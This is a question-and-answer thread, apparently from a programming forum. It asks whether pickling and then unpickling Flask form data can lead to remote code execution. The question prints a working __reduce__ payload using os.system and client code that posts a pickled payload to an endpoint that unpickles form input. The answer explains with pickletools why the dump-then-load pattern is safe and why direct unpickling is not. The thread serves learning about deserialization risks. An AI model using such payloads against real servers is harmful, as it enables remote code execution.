Disclaimer: This question is not for malicious purposes!! I am working on my OWN virtual machine!
The article here demonstrates how loading untrusted pickle data can lead to remote code execution, I am investigating ways of using this workflow without the security issues.
My question is as follows - If I have made it such that the webapp gets a request in Flask, uses pickle.dumps()
on the request.form
, then uses pickle.loads()
on what was previously dumped, is there still a way to execute malicious code?
Example server code:
@blueprint.route('/test', methods=['GET', 'POST'])
def test():
test=pickle.dumps(request.form)
test2=pickle.loads(test) # THE CODE SHOULD BE EXECUTED AT THIS POINT
return ...
Is this workflow still vulnerable? From my understanding, the most common type of exploit with pickle comes when b64 string is passed through and interpreted by pickle.loads()
. However, is it possible to achieve the same results if pickle.dumps()
is called on the form prior to pickle.loads()
?
I have tried a couple things, but nothing has panned out. Please let me know if you know the secret code :)
here is an example malicious user code from the same article
import pickle
import base64
import os
class RCE:
def __reduce__(self):
cmd = ('echo EXECUTED THIS STATEMENT')
return os.system, (cmd,)
if __name__ == '__main__':
pickled = pickle.dumps(RCE())
print(base64.urlsafe_b64encode(pickled))
# Running pickle.loads(pickle.dumps(RCE())) would execute 'echo EXECUTED THIS STATEMENT'
# I need to pass through RCE() because pickle.dumps() and pickle.loads() are server-side
That would return a base64 string, that when interpreted by pickle.loads()
, would execute the code in cmd.
But how can you pass the result of RCE()
in a request, so that it can then be dumped by pickle.dumps()
on the server-side, before pickle.loads()
and still execute malicious code?
Example (This code does not work):
client code
class RCE:
def __reduce__(self):
cmd = ('echo EXECUTED THIS STATEMENT')
return os.system, (cmd, )
data = {
'test': RCE()
}
s = requests.Session()
r = s.post(URL "/test", data=data)
server-side code
@blueprint.route('/test', methods=['GET', 'POST'])
def test():
test=pickle.dumps(request.form)
test2=pickle.loads(test) # THE CODE SHOULD BE EXECUTED AT THIS POINT
return ...
Example (This code works):
client code
class RCE:
def __reduce__(self):
cmd = ('echo EXECUTED THIS STATEMENT')
return os.system, (cmd, )
data = {
'test': pickle.dumps(RCE())
}
s = requests.Session()
r = s.post(URL "/test", data=data)
server-side code
@blueprint.route('/test', methods=['GET', 'POST'])
def test():
test2=pickle.loads(request.form['test']) # THE CODE SHOULD BE EXECUTED AT THIS POINT
return ...
My thinking is the following, is it possible to have a string, that when serialized by pickle.dumps()
on the server-side, returns the same value as if pickle.dumps(RCE())
was executed on the client-side. Of course, the result from pickle.dumps()
on the server side would be a little different because of the request.form
aspect. From my undestanding, as long as there is executable code in the string, pickle.loads()
will execute it.
CodePudding user response:
No there is no way the server can execute remote code by just dumping then loading it, but you can't load pickled data structures either.
I will use pickletools.dis
to demonstrate what would actually happen:
import pickle
import pickletools
class RCE:
def __reduce__(self):
return eval, ("print('MALICIOUS PYTHON CODE HERE')",)
pickled_malicious = pickle.dumps(RCE())
print("what is executed when loading malicious pickle:")
pickletools.dis(pickled_malicious)
print("pickle is type:", type(pickled_malicious))
pickled_string = pickle.dumps(pickled_malicious)
print("what is executed when loading the dump of malicious")
pickletools.dis(pickled_string)
when the malicious code is loaded we load the function eval
or os.system
as well as the argument then the REDUCE
op code runs that function:
what is executed when loading malicious pickle:
0: \x80 PROTO 3
2: c GLOBAL 'builtins eval'
17: q BINPUT 0
19: X BINUNICODE "print('MALICIOUS PYTHON CODE HERE')"
59: q BINPUT 1
61: \x85 TUPLE1
62: q BINPUT 2
64: R REDUCE
65: q BINPUT 3
67: . STOP
The pickled malicious code itself though is just a bytes object,
pickle is type: <class 'bytes'>
so if you dump that the loading would just load a literal bytes object (or maybe string if you are doing base64 encoding but either way it is just a literal at this point)
what is executed when loading the dump of malicious
0: \x80 PROTO 3
2: C SHORT_BINBYTES b"\x80\x03cbuiltins\neval\nq\x00X#\x00\x00\x00print('MALICIOUS PYTHON CODE HERE')q\x01\x85q\x02Rq\x03."
72: q BINPUT 0
74: . STOP
highest protocol among opcodes = 3
This means that if the server is just calling pickle.dumps
in the input (which is a string of base64 data or bytes data containing pickle data, either way it is just a literal value when it is dumped) then when it calls pickle.loads
on that result it will just get back the original input.
Any scenario that interprets user input as pickle data is vulnerable - but you aren't doing that here - you are creating pickle data from known safe input (the input string) and then loading that.